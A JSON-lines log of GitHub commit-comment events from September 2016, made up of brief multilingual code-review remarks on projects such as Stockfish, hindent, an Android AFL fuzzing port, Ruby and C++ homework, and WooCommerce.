{"id":"4507393211","type":"CommitCommentEvent","actor":{"login":"eddiewebb111"},"repo":{"name":"eddiewebb111/halfbreed"},"payload":{"comment":{"id":18877218,"position":12,"line":12,"path":"eddie-a62dede1344f.json","commit_id":"50c2649c40d6a27aac6b482b7a49ce29f11c35f2","created_at":"2016-09-02T09:02:59Z","updated_at":"2016-09-02T09:02:59Z","body":"\r\n[takeout-20160831T082547Z (2).zip](https://github.com/eddiewebb111/halfbreed/files/451585/takeout-20160831T082547Z.2.zip)\r\n[takeout-20160831T082547Z (2).zip](https://github.com/eddiewebb111/halfbreed/files/451589/takeout-20160831T082547Z.2.zip)\r\n[](url)"}},"created_at":"2016-09-02T09:02:59Z"}
{"id":"4507393677","type":"CommitCommentEvent","actor":{"login":"bigretromike"},"repo":{"name":"bigretromike/nakamori"},"payload":{"comment":{"id":18877219,"position":null,"line":null,"path":null,"commit_id":"b353197665a1ea065aec90b2d8cafa17ca967e1d","created_at":"2016-09-02T09:03:06Z","updated_at":"2016-09-02T09:03:06Z","body":"so, new jmm support banners? good "}},"created_at":"2016-09-02T09:03:06Z"}
{"id":"4507397782","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18877224,"position":null,"line":null,"path":null,"commit_id":"ab3dde3206e22977c5828174ead814bcd4066d9e","created_at":"2016-09-02T09:04:00Z","updated_at":"2016-09-02T09:04:00Z","body":"@snicolet As a side note, would there be room for `Bitboard behind[COLOR_NB]` in the Pawns entry? Sorry for the silly question..."}},"created_at":"2016-09-02T09:04:00Z"}
{"id":"4507399116","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Melevolen/ruby_way"},"payload":{"comment":{"id":18877226,"position":66,"line":107,"path":"lesson_9/modules.rb","commit_id":"bf6c097549472d80cdd8df6eb08042d49fb6350e","created_at":"2016-09-02T09:04:18Z","updated_at":"2016-09-02T09:04:18Z","body":"У тебя нет доступа к этой переменной, точнее ты здесь обращаешься к инстанс-перменной, но правила хранятся в [инстанс-переменной уровня класса](https://habrahabr.ru/post/111781/). Здесь у тебя будет nil и each не сработает. Нужно обращаться к геттеру класса"}},"created_at":"2016-09-02T09:04:18Z"}
{"id":"4507399370","type":"CommitCommentEvent","actor":{"login":"asoldano"},"repo":{"name":"gaol/wildfly"},"payload":{"comment":{"id":18877228,"position":82,"line":82,"path":"testsuite/integration/basic/src/test/java/org/jboss/as/test/integration/jaxrs/packaging/war/JaxrsDeploymentTestCase.java","commit_id":"34afc2d295fbe0bfe49eade195e6754837fd7364","created_at":"2016-09-02T09:04:22Z","updated_at":"2016-09-02T09:04:22Z","body":"Well, \"my format\" is really the way you write the signature in java. This said, perhaps other subsystems already offer similar funcitonalities, perhaps you could check and make sure we use the same format (assuming everybody is using the same, otherwise let's choose ours ;-) )"}},"created_at":"2016-09-02T09:04:22Z"}
{"id":"4507400435","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Melevolen/ruby_way"},"payload":{"comment":{"id":18877231,"position":28,"line":75,"path":"lesson_9/modules.rb","commit_id":"bf6c097549472d80cdd8df6eb08042d49fb6350e","created_at":"2016-09-02T09:04:37Z","updated_at":"2016-09-02T09:04:37Z","body":"Проще объявить геттер через attr_reader."}},"created_at":"2016-09-02T09:04:37Z"}
{"id":"4507401665","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"YevhenHordiichuk-itstep/ITStep_Lesson_4"},"payload":{"comment":{"id":18877234,"position":12,"line":12,"path":"homework_4_01.cpp","commit_id":"0fc5dea92f54a3871cf09ffe7724df8076269be3","created_at":"2016-09-02T09:04:54Z","updated_at":"2016-09-02T09:04:54Z","body":"функция должна возвращать значение,  а печаттать нужно в отдельной задаче"}},"created_at":"2016-09-02T09:04:54Z"}
{"id":"4507402203","type":"CommitCommentEvent","actor":{"login":"connor-baer"},"repo":{"name":"uwc/uwc-website"},"payload":{"comment":{"id":18877237,"position":null,"line":null,"path":null,"commit_id":"6ed26ccd1dcc394c3d4814b20249aa8bbad3da05","created_at":"2016-09-02T09:05:02Z","updated_at":"2016-09-02T09:05:02Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;4uxJFZPb&#x2F;2-test\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Test</a>"}},"created_at":"2016-09-02T09:05:02Z"}
{"id":"4507404069","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"YevhenHordiichuk-itstep/ITStep_Lesson_4"},"payload":{"comment":{"id":18877244,"position":18,"line":18,"path":"homework_4_01.cpp","commit_id":"0fc5dea92f54a3871cf09ffe7724df8076269be3","created_at":"2016-09-02T09:05:28Z","updated_at":"2016-09-02T09:05:28Z","body":"return print смысла не имеет, это колво напечатанных байт, а не то, что должна делать функция top()"}},"created_at":"2016-09-02T09:05:28Z"}
{"id":"4507405197","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Melevolen/ruby_way"},"payload":{"comment":{"id":18877246,"position":69,"line":110,"path":"lesson_9/modules.rb","commit_id":"bf6c097549472d80cdd8df6eb08042d49fb6350e","created_at":"2016-09-02T09:05:43Z","updated_at":"2016-09-02T09:05:43Z","body":"Зачем сюда что-то сохранять? Просто вызывай нужные методы и все, если какой-то метод выбросил исключение, то все, работа прекращается."}},"created_at":"2016-09-02T09:05:43Z"}
{"id":"4507406772","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Melevolen/ruby_way"},"payload":{"comment":{"id":18877251,"position":74,"line":113,"path":"lesson_9/modules.rb","commit_id":"bf6c097549472d80cdd8df6eb08042d49fb6350e","created_at":"2016-09-02T09:06:06Z","updated_at":"2016-09-02T09:06:06Z","body":"И rescue тут не нужен, он нужен в методе `valid?`"}},"created_at":"2016-09-02T09:06:06Z"}
{"id":"4507410276","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Melevolen/ruby_way"},"payload":{"comment":{"id":18877261,"position":69,"line":110,"path":"lesson_9/modules.rb","commit_id":"bf6c097549472d80cdd8df6eb08042d49fb6350e","created_at":"2016-09-02T09:06:52Z","updated_at":"2016-09-02T09:06:52Z","body":"Кстати,  send тут не сработает, т.к. ты пытаешься вызывать инстанс-метод, но все методы проверки перенес зачем-то на уровень класса."}},"created_at":"2016-09-02T09:06:52Z"}
{"id":"4507411341","type":"CommitCommentEvent","actor":{"login":"henices"},"repo":{"name":"ele7enxxh/android-afl"},"payload":{"comment":{"id":18877264,"position":null,"line":null,"path":null,"commit_id":"25c80942278810290a8901915a1d7ada6888fe72","created_at":"2016-09-02T09:07:07Z","updated_at":"2016-09-02T09:07:07Z","body":":) "}},"created_at":"2016-09-02T09:07:07Z"}
{"id":"4507412415","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Melevolen/ruby_way"},"payload":{"comment":{"id":18877266,"position":82,"line":119,"path":"lesson_9/modules.rb","commit_id":"bf6c097549472d80cdd8df6eb08042d49fb6350e","created_at":"2016-09-02T09:07:21Z","updated_at":"2016-09-02T09:07:21Z","body":"Этот метод должен вызывать validate! и в случае исключения возвращать false. А если исключений нет - true"}},"created_at":"2016-09-02T09:07:21Z"}
{"id":"4507414451","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18877271,"position":null,"line":null,"path":null,"commit_id":"3906fc2f31b1882ca9c580304de193364d97bbc7","created_at":"2016-09-02T09:07:49Z","updated_at":"2016-09-02T09:07:49Z","body":"Looks like a good way of doing it. I'm currently in an i3 session and will check the package a little later.\r\nHowever I think in no case we should have QT_STYLE_OVERRIDE set to **gtk** since it's outdated. Should we not also change it to be **gtk2** for the case when qt5ct is not set?"}},"created_at":"2016-09-02T09:07:49Z"}
{"id":"4507414551","type":"CommitCommentEvent","actor":{"login":"cayleyws"},"repo":{"name":"Relsoul/SoulEXP"},"payload":{"comment":{"id":18877272,"position":null,"line":null,"path":null,"commit_id":"06007ca0d1a83a04f743c2b5c3f57b30fb1ddaac","created_at":"2016-09-02T09:07:51Z","updated_at":"2016-09-02T09:07:51Z","body":"太牛逼了"}},"created_at":"2016-09-02T09:07:51Z"}
{"id":"4507419429","type":"CommitCommentEvent","actor":{"login":"NAVEENGANDHI"},"repo":{"name":"NAVEENGANDHI/hello-world"},"payload":{"comment":{"id":18877287,"position":null,"line":null,"path":null,"commit_id":"0b43d70017e9dcaf039d45a5fa274e45e7d3472e","created_at":"2016-09-02T09:08:57Z","updated_at":"2016-09-02T09:08:57Z","body":"I am Naveen Gandhi and I am developing my own website."}},"created_at":"2016-09-02T09:08:57Z"}
{"id":"4507419783","type":"CommitCommentEvent","actor":{"login":"mwperina"},"repo":{"name":"machacekondra/ansible-modules-extras"},"payload":{"comment":{"id":18877288,"position":139,"line":139,"path":"cloud/ovirt/ovirt_disks.py","commit_id":"574d4f9af2f8c0f4fa77ae0ecc5bec265ca420a5","created_at":"2016-09-02T09:09:01Z","updated_at":"2016-09-02T09:09:01Z","body":"We should have api.ovirt.org in near future for those types of documentation, more info at https://github.com/oVirt/ovirt-site/issues/398. We can move ovirt-api-explorer when ready"}},"created_at":"2016-09-02T09:09:01Z"}
{"id":"4507419926","type":"CommitCommentEvent","actor":{"login":"est77"},"repo":{"name":"ImageEngine/gaffer"},"payload":{"comment":{"id":18877291,"position":1,"line":1,"path":"src/GafferAppleseed/AppleseedRender.cpp","commit_id":"0bbba1e94715865c8f862c1d412df273a3c3217a","created_at":"2016-09-02T09:09:03Z","updated_at":"2016-09-02T09:09:03Z","body":"Yes. I tried to match the Arnold backend as close as possible.\r\nMy idea was that it is going to be easier to review, understand and modify the backend if needed, this way.\r\nI also tried to add many comments related to the \"appleseed\" way of doing things as I expect other developers \r\nnot to be very familiar with the appleseed API.\r\n\r\nLet me know if some parts of the code are difficult to follow and I can add some more comments or try to make  things more clear."}},"created_at":"2016-09-02T09:09:03Z"}
{"id":"4507421768","type":"CommitCommentEvent","actor":{"login":"naiii"},"repo":{"name":"RedFantom/GSF-Parser"},"payload":{"comment":{"id":18877298,"position":null,"line":null,"path":null,"commit_id":"da1d6b2d359eca6043bd0ca2c05339dad7140e39","created_at":"2016-09-02T09:09:28Z","updated_at":"2016-09-02T09:09:28Z","body":"Whoops...\r\n\r\nForgot to change the commit message :')\r\n\r\nWell, no warnings removed, just added my file\r\n"}},"created_at":"2016-09-02T09:09:28Z"}
{"id":"4507427027","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":18877307,"position":10,"line":10,"path":"band-persistence/src/main/java/hu/schonherz/training/band/entities/ResourceEntity.java","commit_id":"6a76c033f6eb4f5b08934eed15efcee26b1f6416","created_at":"2016-09-02T09:10:41Z","updated_at":"2016-09-02T09:10:41Z","body":"Remove empty line between annotation and JavaDoc."}},"created_at":"2016-09-02T09:10:41Z"}
{"id":"4507430448","type":"CommitCommentEvent","actor":{"login":"samitsv"},"repo":{"name":"PokemonGoers/PokeData"},"payload":{"comment":{"id":18877315,"position":null,"line":null,"path":null,"commit_id":"893dc44a41c863e69b2c6c3bde5b4d455e23b4c3","created_at":"2016-09-02T09:11:26Z","updated_at":"2016-09-02T09:11:26Z","body":"@swathi-ssunder I made the changes by looking the names of the pokemon in the pokemonGoData.json and matched them to the image names, so that there wont be like pokemons which wont have pokemonIcon."}},"created_at":"2016-09-02T09:11:26Z"}
{"id":"4507430771","type":"CommitCommentEvent","actor":{"login":"jonmcalder"},"repo":{"name":"jonmcalder/refactor"},"payload":{"comment":{"id":18877316,"position":27,"line":30,"path":"R/cut.integer.R","commit_id":"4620a7ec43c9844753d92a34e7f9c5cda560ec5f","created_at":"2016-09-02T09:11:30Z","updated_at":"2016-09-02T09:11:30Z","body":"Not sure if I'm understanding you fully, but due to the copy on modify symantics in R I don't see this as a problem. Changing function arguments within the function itself is perfectly safe [(as outlined in this StackOverflow answer)](http://stackoverflow.com/questions/15759117/what-exactly-is-copy-on-modify-semantics-in-r-and-where-is-the-canonical-source) and to me makes the code more readable than if you were to copy to function arguments to new variables and then modify them. I think it's easy to take that kind of approach too far and end up having many new (semi-redundant) variables to keep track of which makes code harder to comprehend. I think it does of course depend on the context though.\r\n\r\nRegarding variable names, I do tend to use camelCase mostly but am happy to change - here I was taking my lead from the existing function parameters hence the inconsistency. Not sure what the convention should be regarding function arguments - I see Hadley's style guide suggest the use of underscore for variable names in general so maybe we should use that rather than camelCase?"}},"created_at":"2016-09-02T09:11:30Z"}
{"id":"4507431165","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":18877318,"position":12,"line":12,"path":"band-persistence/src/main/java/hu/schonherz/training/band/entities/ResourceEntity.java","commit_id":"6a76c033f6eb4f5b08934eed15efcee26b1f6416","created_at":"2016-09-02T09:11:36Z","updated_at":"2016-09-02T09:11:36Z","body":"My preference would be to call this class `BaseAssetEntity`."}},"created_at":"2016-09-02T09:11:36Z"}
{"id":"4507432223","type":"CommitCommentEvent","actor":{"login":"chrisdone"},"repo":{"name":"chrisdone/hindent"},"payload":{"comment":{"id":18877322,"position":9,"line":174,"path":"TESTS.md","commit_id":"d277fa77e675f77e98c590b4d7bd67abe860f12e","created_at":"2016-09-02T09:11:50Z","updated_at":"2016-09-02T09:11:50Z","body":"Me neither. Perhaps we just bite the bullet and do:\r\n``` haskell\r\nlongLongFunction ::\r\n  ReaderT r (WriterT w (StateT s m)) a\r\n  -> StateT s (WriterT w (ReaderT r m)) a\r\n  -> Etc\r\n```\r\n"}},"created_at":"2016-09-02T09:11:50Z"}
{"id":"4507436783","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"YevhenHordiichuk-itstep/ITStep_Lesson_4"},"payload":{"comment":{"id":18877338,"position":8,"line":8,"path":"homework_4_01_1.cpp","commit_id":"0fc5dea92f54a3871cf09ffe7724df8076269be3","created_at":"2016-09-02T09:12:56Z","updated_at":"2016-09-02T09:12:56Z","body":"те же замечания, что и в предыдущей задаче"}},"created_at":"2016-09-02T09:12:56Z"}
{"id":"4507436945","type":"CommitCommentEvent","actor":{"login":"henices"},"repo":{"name":"ele7enxxh/android-afl"},"payload":{"comment":{"id":18877339,"position":null,"line":null,"path":null,"commit_id":"25c80942278810290a8901915a1d7ada6888fe72","created_at":"2016-09-02T09:12:57Z","updated_at":"2016-09-02T09:12:57Z","body":"recompile with afl-clang-fast and afl-clang-fast++  这节的是否需求修改为\r\n\r\n```\r\nLOCAL_CLANG := true\r\nLOCAL_CC := afl-clang-fast\r\nLOCAL_CXX := afl-clang-fast++\r\n```\r\n\r\n"}},"created_at":"2016-09-02T09:12:57Z"}
{"id":"4507438021","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"YevhenHordiichuk-itstep/ITStep_Lesson_4"},"payload":{"comment":{"id":18877341,"position":8,"line":8,"path":"homework_4_04.cpp","commit_id":"0fc5dea92f54a3871cf09ffe7724df8076269be3","created_at":"2016-09-02T09:13:11Z","updated_at":"2016-09-02T09:13:11Z","body":"те же замечания, что и в предыдущей задаче"}},"created_at":"2016-09-02T09:13:11Z"}
{"id":"4507440411","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"YevhenHordiichuk-itstep/ITStep_Lesson_4"},"payload":{"comment":{"id":18877348,"position":null,"line":null,"path":null,"commit_id":"0fc5dea92f54a3871cf09ffe7724df8076269be3","created_at":"2016-09-02T09:13:43Z","updated_at":"2016-09-02T09:13:43Z","body":"return printf() - некорректно и имеет совершенно другой смысл, а не то, что должны возвращать эти функции."}},"created_at":"2016-09-02T09:13:43Z"}
{"id":"4507440916","type":"CommitCommentEvent","actor":{"login":"chbae"},"repo":{"name":"nicolas4119/meta-genivi-dev"},"payload":{"comment":{"id":18877349,"position":null,"line":null,"path":null,"commit_id":"7f7cbef9e1606c1f5e6863dcd78ebaca011f6551","created_at":"2016-09-02T09:13:50Z","updated_at":"2016-09-02T09:13:50Z","body":"Is this qt bug? Those patches come from qt upstream?\r\n\r\nThanks for your contribution"}},"created_at":"2016-09-02T09:13:50Z"}
{"id":"4507443043","type":"CommitCommentEvent","actor":{"login":"ricctram"},"repo":{"name":"woothemes/woocommerce"},"payload":{"comment":{"id":18877355,"position":null,"line":null,"path":null,"commit_id":"fce7771d82eb5f7a4e15d606e266fbd88460e6fc","created_at":"2016-09-02T09:14:19Z","updated_at":"2016-09-02T09:14:19Z","body":"I think there is a problem with this fix.\r\nNow it gives the types of shipping like: Free shipping, Fix rate, Pick up ...but it should give the shipping methods like: Local delivery, International delivery which are both fix rate type... but in my case i want to enable only for local delivery and not for international delivery..\r\nam i wrong?\r\n"}},"created_at":"2016-09-02T09:14:19Z"}
{"id":"4507444378","type":"CommitCommentEvent","actor":{"login":"mkroon1"},"repo":{"name":"LOVDnl/LOVD3"},"payload":{"comment":{"id":18877359,"position":33,"line":33,"path":"src/inc-lib-diseases.php","commit_id":"af308da9183b10aa709652e0e029174c5dcb7dd9","created_at":"2016-09-02T09:14:37Z","updated_at":"2016-09-02T09:14:37Z","body":"Yes, that's the intention."}},"created_at":"2016-09-02T09:14:37Z"}
{"id":"4507449965","type":"CommitCommentEvent","actor":{"login":"Speins"},"repo":{"name":"Speins/TestRepo"},"payload":{"comment":{"id":18877367,"position":null,"line":null,"path":null,"commit_id":"b3f3691f546c6872c80155187ff877b04231d03d","created_at":"2016-09-02T09:15:55Z","updated_at":"2016-09-02T09:15:55Z","body":"yay"}},"created_at":"2016-09-02T09:15:55Z"}
{"id":"4507450057","type":"CommitCommentEvent","actor":{"login":"NightMoon032"},"repo":{"name":"LeagueSharp-Devs/LeagueSharp.SDKEx"},"payload":{"comment":{"id":18877368,"position":null,"line":null,"path":null,"commit_id":"c3d2c560fcaa87cc08f9f96c698c7746707404e1","created_at":"2016-09-02T09:15:57Z","updated_at":"2016-09-02T09:15:57Z","body":"Nice!"}},"created_at":"2016-09-02T09:15:57Z"}
{"id":"4507450132","type":"CommitCommentEvent","actor":{"login":"ele7enxxh"},"repo":{"name":"ele7enxxh/android-afl"},"payload":{"comment":{"id":18877369,"position":null,"line":null,"path":null,"commit_id":"25c80942278810290a8901915a1d7ada6888fe72","created_at":"2016-09-02T09:15:58Z","updated_at":"2016-09-02T09:15:58Z","body":"你是对的"}},"created_at":"2016-09-02T09:15:58Z"}
{"id":"4507453532","type":"CommitCommentEvent","actor":{"login":"fredrious"},"repo":{"name":"MeenaChoi/MSstats"},"payload":{"comment":{"id":18877379,"position":10,"line":7,"path":"DESCRIPTION","commit_id":"3ccff66d35f80bf80c7c81e5f5771a07c629ac8c","created_at":"2016-09-02T09:16:45Z","updated_at":"2016-09-02T09:16:45Z","body":"There is bug in dataProces > L1885\r\n\r\nlab <- unique(work[, c(\"RUN\", \"originalRUN\", \"GROUP\", \"GROUP_ORIGINAL\", \"SUBJECT_ORIGINAL\", \"SUBJECT_NESTED\", \"SUBJECT\")])\r\n\r\n\"originalRUN\" is undefined at this level. It is first defined in L1195 but then probably lost somewhere in between! \r\n"}},"created_at":"2016-09-02T09:16:45Z"}
{"id":"4507455129","type":"CommitCommentEvent","actor":{"login":"brian0305"},"repo":{"name":"LeagueSharp-Devs/LeagueSharp.SDKEx"},"payload":{"comment":{"id":18877384,"position":null,"line":null,"path":null,"commit_id":"c3d2c560fcaa87cc08f9f96c698c7746707404e1","created_at":"2016-09-02T09:17:09Z","updated_at":"2016-09-02T09:17:09Z","body":"Did you test new tweak i put in this Orbwalker ? (Faster Kite)"}},"created_at":"2016-09-02T09:17:09Z"}
{"id":"4507459262","type":"CommitCommentEvent","actor":{"login":"cblp"},"repo":{"name":"chrisdone/hindent"},"payload":{"comment":{"id":18877398,"position":9,"line":174,"path":"TESTS.md","commit_id":"d277fa77e675f77e98c590b4d7bd67abe860f12e","created_at":"2016-09-02T09:18:04Z","updated_at":"2016-09-02T09:18:04Z","body":"Vertical alignment is a good thing. It allows find errors with visual patterns. Compare:\r\n\r\n```haskell\r\nlongLongFunction ::\r\n  ReaderT r (WriterT w (State s m)) a\r\n  -> ReaderT r (WriterT w (StateT s m)) a\r\n```\r\n\r\n```haskell\r\nlongLongFunction ::\r\n     ReaderT r (WriterT w (State s m)) a\r\n  -> ReaderT r (WriterT w (StateT s m)) a\r\n```\r\n"}},"created_at":"2016-09-02T09:18:04Z"}
{"id":"4507468456","type":"CommitCommentEvent","actor":{"login":"NightMoon032"},"repo":{"name":"LeagueSharp-Devs/LeagueSharp.SDKEx"},"payload":{"comment":{"id":18877414,"position":null,"line":null,"path":null,"commit_id":"c3d2c560fcaa87cc08f9f96c698c7746707404e1","created_at":"2016-09-02T09:20:09Z","updated_at":"2016-09-02T09:20:09Z","body":"not have test, but i 3 days ago i have some change about Orbwalker like this(only change 250 -> 300, but work fine for me)"}},"created_at":"2016-09-02T09:20:09Z"}
{"id":"4507470206","type":"CommitCommentEvent","actor":{"login":"TheDiamondYT1"},"repo":{"name":"niranjan94/show-java"},"payload":{"comment":{"id":18877422,"position":null,"line":null,"path":null,"commit_id":"7764c507ffe88aaa1fc90393e08d836c0dab6369","created_at":"2016-09-02T09:20:28Z","updated_at":"2016-09-02T09:20:28Z","body":"@niranjan94 Hi can you help me fix my listview? Its in my project [DroidGit.](https://github.com/TheDiamondYT1/DroidGit)\r\n\r\nI think its something to do with my xml because when i change the adapter to inflate the `simple_list_item_1` it works, but i need my one because it contains cardview"}},"created_at":"2016-09-02T09:20:28Z"}
{"id":"4507474471","type":"CommitCommentEvent","actor":{"login":"sanjeevareddymaram"},"repo":{"name":"Zone24x7/redmine"},"payload":{"comment":{"id":18877434,"position":1,"line":1,"path":"app/controllers/account_controller.rb","commit_id":"30232609c729374c3520349ddd0ac903324048af","created_at":"2016-09-02T09:21:24Z","updated_at":"2016-09-02T09:21:24Z","body":"Hi Chathuranga,\r\n\r\nThe deletion happened due to the following reason:\r\n\r\n1. In past, I checked in the entire project code in GIT\r\n2. After sometime, I had a discussion with you regarding code checkin and you asked me to check in only the modified files.\r\n3. So I deleted the Unmodifed/old files and checking in only modified files from then on.\r\n\r\nPlease let me know if there are any concerns.\r\n\r\nThanks,\r\nSanjeeva Reddy Maram."}},"created_at":"2016-09-02T09:21:24Z"}
{"id":"4507474473","type":"CommitCommentEvent","actor":{"login":"Simber1"},"repo":{"name":"Simber1/Sunny-Dale-school-tut"},"payload":{"comment":{"id":18877435,"position":4,"line":47,"path":"sunnyDaleSchool/src/uk/org/kelsohighschool/ps/sunnyDaleSchool/servlet/FacultiesServlet.java","commit_id":"3b21adc4b523190d7932fb2d154d95a6eab57c10","created_at":"2016-09-02T09:21:24Z","updated_at":"2016-09-02T09:21:24Z","body":"Taken out a space"}},"created_at":"2016-09-02T09:21:24Z"}
{"id":"4507479988","type":"CommitCommentEvent","actor":{"login":"miktim"},"repo":{"name":"miktim/RESTup"},"payload":{"comment":{"id":18877453,"position":null,"line":null,"path":null,"commit_id":"eb8b5eee173447ff8b7953cfaaaac425621d8e4c","created_at":"2016-09-02T09:22:39Z","updated_at":"2016-09-02T09:22:39Z","body":"config and examples for Linux"}},"created_at":"2016-09-02T09:22:39Z"}
{"id":"4507482668","type":"CommitCommentEvent","actor":{"login":"PhoebePan"},"repo":{"name":"TMDer/chrome-extension-AA-Miner"},"payload":{"comment":{"id":18877459,"position":null,"line":null,"path":null,"commit_id":"ca4467dd130ffa9643b9e8f5c41513f5cb472c55","created_at":"2016-09-02T09:23:16Z","updated_at":"2016-09-02T09:23:16Z","body":"登入Ok!\r\n尚缺 Logout 畫面。"}},"created_at":"2016-09-02T09:23:16Z"}
{"id":"4507486097","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18877470,"position":null,"line":null,"path":null,"commit_id":"fc9f73d860ecc8ac010ae52130ee4eb87215d73d","created_at":"2016-09-02T09:24:03Z","updated_at":"2016-09-02T09:24:03Z","body":"Nice but this way you evaluate space much later in the game in some cases, which I think will backfire..."}},"created_at":"2016-09-02T09:24:03Z"}
{"id":"4507490399","type":"CommitCommentEvent","actor":{"login":"cblp"},"repo":{"name":"chrisdone/hindent"},"payload":{"comment":{"id":18877479,"position":9,"line":174,"path":"TESTS.md","commit_id":"d277fa77e675f77e98c590b4d7bd67abe860f12e","created_at":"2016-09-02T09:25:00Z","updated_at":"2016-09-02T09:25:00Z","body":"Actually, we can't provide ideally greppable function signatures:\r\n\r\n```haskell\r\nfun1, fun2 :: a\r\n```\r\n\r\nHere, `fun1` cannot be found with `/fun1 ::/`. Also, `fun2` cannot be found with `/^fun2 ::/`.\r\n\r\nSo, does it cost?\r\n\r\nMoreover, there are better ways to find a function — ghc-mod, hasktags, haddock, etc."}},"created_at":"2016-09-02T09:25:00Z"}
{"id":"4507508309","type":"CommitCommentEvent","actor":{"login":"MichaelWedel"},"repo":{"name":"DMSC-Instrument-Data/documents"},"payload":{"comment":{"id":18877518,"position":38,"line":127,"path":"design/plankton/CommunicationLayerDesign.md","commit_id":"448b8019a314f730b86cd7b285e1bdb66f04082d","created_at":"2016-09-02T09:28:52Z","updated_at":"2016-09-02T09:28:52Z","body":"I thought this goes into the `Adapter` which then exposes it somehow. Then we'd have two layers as discussed before with `Device` and `Adapter`, where `SpecifiedDevice = Adapter + Device`. Do I understand correctly that what you propose here would be `SpecifiedDevice = Adapter + Device + DeviceModel`?"}},"created_at":"2016-09-02T09:28:52Z"}
{"id":"4507509412","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18877520,"position":null,"line":null,"path":null,"commit_id":"fc9f73d860ecc8ac010ae52130ee4eb87215d73d","created_at":"2016-09-02T09:29:08Z","updated_at":"2016-09-02T09:29:08Z","body":"Yes, this is why there are tests in fishtests"}},"created_at":"2016-09-02T09:29:08Z"}
{"id":"4507517093","type":"CommitCommentEvent","actor":{"login":"ddpatel2606"},"repo":{"name":"quizlet/scissors"},"payload":{"comment":{"id":18877549,"position":null,"line":null,"path":null,"commit_id":"6bc9a1c5695b99de0c1792185e28aafa2b64983e","created_at":"2016-09-02T09:30:45Z","updated_at":"2016-09-02T09:30:45Z","body":"Thanks for your effort but how can I get output of rounded image."}},"created_at":"2016-09-02T09:30:45Z"}
{"id":"4507518700","type":"CommitCommentEvent","actor":{"login":"JansonLiao"},"repo":{"name":"JansonLiao/HelloWorld"},"payload":{"comment":{"id":18877552,"position":3,"line":6,"path":"README.md","commit_id":"95861a5f970a3f73527523f4bc5cc6d72c51b529","created_at":"2016-09-02T09:31:06Z","updated_at":"2016-09-02T09:31:06Z","body":"这里有一点问题"}},"created_at":"2016-09-02T09:31:06Z"}
{"id":"4507521780","type":"CommitCommentEvent","actor":{"login":"nabbhacker"},"repo":{"name":"LeagueSharp-Devs/LeagueSharp.SDKEx"},"payload":{"comment":{"id":18877560,"position":null,"line":null,"path":null,"commit_id":"c3d2c560fcaa87cc08f9f96c698c7746707404e1","created_at":"2016-09-02T09:31:46Z","updated_at":"2016-09-02T09:31:46Z","body":"hero != null && hero.IsValidTarget() :roto2:"}},"created_at":"2016-09-02T09:31:46Z"}
{"id":"4507531096","type":"CommitCommentEvent","actor":{"login":"lmq3342xja"},"repo":{"name":"tagatac/caja"},"payload":{"comment":{"id":18877580,"position":null,"line":null,"path":null,"commit_id":"988eee1c5e15828ef9b56ff10a46a95bffbffe76","created_at":"2016-09-02T09:33:49Z","updated_at":"2016-09-02T09:33:49Z","body":"why don't merge master?"}},"created_at":"2016-09-02T09:33:49Z"}
{"id":"4507532014","type":"CommitCommentEvent","actor":{"login":"sbojchuk"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":18877583,"position":5,"line":46,"path":"src/main/java/com/softserverinc/edu/repositories/UserRepository.java","commit_id":"2553fb9a31883c8a391842e47c1f0e15aabf42c8","created_at":"2016-09-02T09:34:02Z","updated_at":"2016-09-02T09:34:02Z","body":"better to add Pageable as the last parameter, because it can be avoided, and method would work without it"}},"created_at":"2016-09-02T09:34:02Z"}
{"id":"4507534093","type":"CommitCommentEvent","actor":{"login":"NamelessCoder"},"repo":{"name":"misterboe/slickcarousel"},"payload":{"comment":{"id":18877589,"position":null,"line":null,"path":null,"commit_id":"f8f82e3136d56489d5e6302b64c47dc796fe8db1","created_at":"2016-09-02T09:34:29Z","updated_at":"2016-09-02T09:34:29Z","body":"- NamelessCoder\\GizzleGitPlugins\\GizzlePlugins\\ClonePlugin:0000000050c54c3f000000004878071a:\n  - 0: Executing Git clone command: /usr/bin/git clone --depth 1 --single-branch --branch '1.0.0' 'https://github.com/misterboe/slickcarousel.git' /tmp/f8f82e3136d56489d5e6302b64c47dc796fe8db1/slickcarousel\n  - NamelessCoder\\TYPO3RepositoryGizzle\\GizzlePlugins\\ExtensionRepositoryReleasePlugin:0000000050c54c21000000004878071a:\n    - resultCode: 10504\n    - resultMessages:\n      - 0: Please note that it might take a while (up to an hour) until your extension and the documentation appear on TYPO3.org.\n      - version: 1.0.0"}},"created_at":"2016-09-02T09:34:29Z"}
{"id":"4507535781","type":"CommitCommentEvent","actor":{"login":"JansonLiao"},"repo":{"name":"JansonLiao/HelloWorld"},"payload":{"comment":{"id":18877593,"position":null,"line":null,"path":null,"commit_id":"95861a5f970a3f73527523f4bc5cc6d72c51b529","created_at":"2016-09-02T09:34:51Z","updated_at":"2016-09-02T09:34:51Z","body":"sdfssdf"}},"created_at":"2016-09-02T09:34:51Z"}
